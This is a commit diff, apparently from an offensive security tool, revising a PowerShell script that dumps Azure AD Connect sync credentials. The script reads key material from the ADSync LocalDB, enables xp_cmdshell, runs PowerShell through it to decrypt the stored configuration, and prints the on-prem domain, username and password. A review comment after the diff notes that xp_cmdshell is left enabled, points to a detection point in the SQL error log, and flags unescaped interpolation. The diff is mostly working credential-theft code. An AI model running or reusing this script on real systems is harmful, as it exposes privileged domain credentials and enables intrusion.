
Commit 23bee81

committed
Remove unnecessary host info and formatting
1 parent 8415e25 commit 23bee81

1 file changed

Lines changed: 10 additions & 14 deletions


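--- a/nxc/data/entry-sync-creds/entry-sync-creds.ps1
+++ b/nxc/data/entry-sync-creds/entry-sync-creds.ps1
@@ -1,6 +1,5 @@
-Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
-Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
-
+# Original script by @_xpn_: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
+# Modified by @NeffIsBack
 $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
 
 try {
@@ -10,8 +9,6 @@ try {
 return
 }
 
-Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
-
 $cmd = $client.CreateCommand()
 $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
 $reader = $cmd.ExecuteReader()
@@ -25,8 +22,6 @@ $instance_id = $reader.GetGuid(1)
 $entropy = $reader.GetGuid(2)
 $reader.Close()
 
-Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
-
 $cmd = $client.CreateCommand()
 $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
 $reader = $cmd.ExecuteReader()
@@ -39,10 +34,12 @@ $config = $reader.GetString(0)
 $crypted = $reader.GetString(1)
 $reader.Close()
 
-Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
+$script = "add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted"
 
 $cmd = $client.CreateCommand()
-$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
+$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
+EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
+EXEC xp_cmdshell 'powershell.exe -c `"$script`"'"
 $reader = $cmd.ExecuteReader()
 
 $decrypted = [string]::Empty
@@ -60,8 +57,7 @@ $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-do
 $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
 $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
 
-Write-Host "[*] Credentials incoming...`n"
-
-Write-Host "Domain: $($domain.Domain)"
-Write-Host "Username: $($username.Username)"
-Write-Host "Password: $($password.Password)"
+Write-Host "[*] Credentials incoming..."
+Write-Host "On-prem Domain: $($domain.Domain)"
+Write-Host "On-prem Username: $($username.Username)"
+Write-Host "On-prem Password: $($password.Password)"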
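Review bot: The `sp_configure` batch in the `@@ -39,10 +34,12 @@` hunk still turns on `show advanced options` and `xp_cmdshell` for the ADSync LocalDB instance, and nothing visible in this section records the previous values or sets them back, so the assessed host is left with OS command execution from SQL enabled after the run. Lines 46–56 of the new file fall outside the shown hunks, so a restore may exist there; if it does not, the side effect should at least be stated next to the new `$script` assignment, e.g. `# Enables xp_cmdshell on the ADSync instance; this script does not revert the setting`. For defenders this is also a reliable detection point, since SQL Server writes sp_configure option changes to its error log. Separately, `$script` interpolates `$crypted`, `$entropy` and `$instance_id` between doubled single quotes with no escaping, which relies on those column values never containing a quote character; a one-line comment saying so would help the next maintainer.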
